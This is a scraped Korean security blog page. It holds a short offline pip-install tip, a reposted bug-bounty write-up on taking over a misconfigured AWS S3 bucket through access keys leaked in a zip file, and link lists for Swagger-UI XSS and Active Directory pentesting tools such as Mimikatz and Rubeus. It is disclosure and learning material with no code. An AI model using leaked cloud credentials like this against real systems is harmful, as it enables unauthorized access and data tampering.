이렇게 다운받고 나서, 폴더를 하나 만들어서 shell 을 켜고 그곳으로 이동한다. 그리고 다음과 같이 다운로드 해준다.

pip --trusted-host pypi.org --trusted-host files.pythonhosted.org download foo

폴더에 foo 파일과 그의 dependency들도 같이 다운로드되어있을 것이다. 이것을 파일 전송 시스템으로 VDI 로 옮겨준다. VDI 에는 python만 깔려있다고 가정한다. 이제 파일 전송 시스템에서 받아온 파일들을 특정 경로에 저장해주고 shell 을 켠다.

python -m pip install --no-index -f . foo

오류가 난다면, whl 파일을 다운받았던 파이썬 버전과 패키지 인스톨하고자 하는 파이썬 버전이 다르지 않은지 확인해보자.

블로그 이미지

wtdsoul

,

https://medium.com/@pratyush1337/information-disclosure-via-misconfigured-aws-to-aws-bucket-takeover-6a6a66470d0e

 

Information Disclosure via Misconfigured AWS to AWS Bucket Takeover

Hey! Welcome to a new write up on my recent finding of a Misconfigured AWS bucket and how i was able to Take full control of the AWS…

medium.com

 

Information Disclosure via Misconfigured AWS to AWS Bucket Takeover

Hey! Welcome to a new write up on my recent finding of a Misconfigured AWS bucket and how i was able to Take full control of the AWS bucket.

I was checking out the website mainly for the IDOR Vulnerabilities as those are considered as High priority bugs and are paid in high range. I was trying to check every possible end-points to find any parameter to manipulate the numerical value so i fired up my burp suite and sent the request to spider tab to check out all the endpoints but i failed because they have encrypted every numerical value using salted algorithm.

As it was not possible to find any IDOR , i found an interesting endpoint where i was able to set my organization logo and there was a direct link to the logo which was residing at an AWS bucket. You can check below:

So i checked this logo by directly coping it and opening it in the new tab:

Basically i never though that i will find anything like this so i never thought of doing anything in any programs or private programs i have worked on but that day i thought that let’s go to origin directory of the file[in hacker’s language ../ ;)]. so i checked it by going to the origin directory as you can see:

Bingo! this was a proper Information disclosure due to Misconfigured ACL of the AWS bucket. I was happy and thought of reporting this directly but as a Hacker you are always overwhelmed and curious to find all the juicy information that might be possible to exploit. So without wasting any time , I went ahead to check out all the files getting listed in the Directory but before that i tried to access one of the file to check if the files are real or not.

Than i opened the file to see what is the content:

Now i am confident enough that all the files available here are legitimate[Use of sophisticated word to look geeky 🤓] and we can see all the internal files of the xyz company here with small tutorials , screenshot and this was an internal S3 bucket used for training and demonstration purposes, such as sharing screenshots of their products……I guess so now you can see why it’s Critical.

At that moment , I felt like it’s enough to report now but i took a chance and thought if there is something else the bucket is offering to compromise itself…Damn Is it possible? Let’s see what happens…. I started checking files with extensions, especially with .zip or .htm or .eml or .doc or .csv and while searching through the entire bucket[which consisted of more than 700+ files] and found the first zip file:

So i downloaded it and checked the contents:

After checking on the files of that zip , i figured out that it’s not going to offer me anything to compromise the AWS bucket. So i started searching for other zip files and found an interesting zip file in the AWS bucket:

Now i downloaded the file and opened to check the contents:

I checked all the files but the important file was the “document.wflow” , It has everything i required to TAKEOVER the AWS Bucket. Let’s check the content:

I was so happy to see this credentials but now the funny thing is that i don’t know what to do with that because Zero knowledge in AWS. So the best way i found was i asked one of my office colleague who is a Dev and works on AWS. He told me that , Go to google and download S3 Browser to start browsing the AWS bucket if you have the “access_key” and “secret_key” which was a very new learning experience in the field of my Web Application Penetration Testing. I was like:

 

So i downloaded it and started providing all the required credentials:

Boom!

The next thing i checked on the Access Control List permission on each directory and found a directory with full access:

With the full access to this directory now I am the Owner of this and i can upload any file i want , I can delete it and i can Delete the whole directory. I had all the access in the world but As you all know we are all ethical in what we do so to make a Proof Of Concept i uploaded a file:

Now to re-verify it I checked it in the public facing bucket with my uploaded file name.

 

Final check I pasted the filename in the URL and checked:

Damn! AWS Bucket Takeover!

Following my initial report and its review, they had promptly and fairly compensated me for letting them know about this bug. I am really thankful for that :)

'경로 및 정보' 카테고리의 다른 글

Fiddler 셋팅  (0) 2023.11.10
VDI python Package 설치  (0) 2023.11.08
Hacking Swagger-UI - from XSS to account takeovers  (0) 2023.11.02
Active Directory 정보 수집  (0) 2023.10.25
Active Directory Pentesting Resources  (1) 2023.10.25
블로그 이미지

wtdsoul

,

https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/

 

Hacking Swagger-UI - from XSS to account takeovers

We have reported more than 60 instances of this bug across a wide range of bug bounty programs including companies like Paypal, Atlassian, Microsoft, GitLab, Yahoo, ...

blog.vidocsecurity.com

 

 

블로그 이미지

wtdsoul

,

https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/

 

Penetration Testing Active Directory, Part I

I’ve had several customers come to me before a pentest and say they think they’re in a good shape because their vulnerability scan shows no critical vulnerabilities and that they’…

hausec.com

 

https://theredteamlabs.com/active-directory-penetration-testing/

 

Active Directory Penetration Testing and Lab Setup - RedTeam

I had several clients come to me before a pentest and say they think they’re in a good shape because their vulnerability scan shows no critical

theredteamlabs.com

 

 

블로그 이미지

wtdsoul

,

https://bhavsec.com/posts/active-directory-resources/

 

This post contains Active Directory Pentesting resources to prepare for new OSCP (2022) exam.

Youtube/Twitch Videos

Active Directory madness and the Esoteric Cult of Domain Admin! - alh4zr3d

TryHackMe - Advent of Cyber + Active Directory - tib3rius

Common Active Directory Attacks: Back to the Basics of Security Practices - TrustedSec

How to build an Active Directory Lab - The Cyber Mentor

Zero to Hero (Episode 8,9,10) - The Cyber Mentor

Blogs

Top Five Ways I Got Domain Admin on Your Internal Network before Lunch

https://medium.com/@Dmitriy_Area51/active-directory-penetration-testing-d9180bff24a1

https://book.hacktricks.xyz/windows/active-directory-methodology

https://zer1t0.gitlab.io/posts/attacking_ad/

Cheatsheets

https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet

https://infosecwriteups.com/active-directory-penetration-testing-cheatsheet-5f45aa5b44ff

TryHackMe VIP/Free Labs

Active Directory Basics - Easy

Post-Exploitation Basics - Easy

Vulnnet Roasted - Easy

Attacktive Directory - Medium

raz0r black - Medium

Enterprise - Medium

Vulnnet Active - Medium

Zero Logon - Hard

TryHackMe Paid Labs ($10 - $60 / month)

Holo - Hard

Throwback - Easy

HackTheBox Subscription/Free Labs

Forest - Easy

Active - Easy

Fuse - Medium

Cascade - Medium

Monteverde - Medium

Resolute - Medium

Arkham - Medium

Mantis - Hard

APT - Insane

HackTheBox Pro Labs ($95 + $27/month)

Dante - Beginner

Offshore - Intermediate

RastaLabs - Intermediate

Cybernetics - Advanced

APT Labs - Advanced

HackTheBox Academy (Paid)

ActiveDirectory LDAP - Medium

ActiveDirectory Powerview - Medium

ActiveDirectory BloodHound - Medium

CyberSecLabs Walkthrough

Secret

Zero

Brute

Dictionary

Roast

Spray

Sync

Toast

Certifications

OSCP - Offensive Security Certified Professional - Offsec - Intermediate

CRTP - Certified Red Team Professional - Pentester Academy - Beginner

CRTE - Certified Red Team Expert - Pentester Academy - Expert

CRTO - Certified Red Team Operator - Zeropoint Security - Intermediate

Courses

Practical Ethical Hacking - TCM Security

Active Directory Pentesting Full Course - Red Team Hacking

Red Team Ethical Hacking - Beginner

Red Team Ethical Hacking - Intermediate

Tools and Repositories

Nishang

Mimikatz

Kekeo

Rubeus

Powersploit

Powercat

PowerUpSQL

HeidiSQL

Proving Grounds Playground - Offensive Security

Hutch, Heist & Vault

블로그 이미지

wtdsoul

,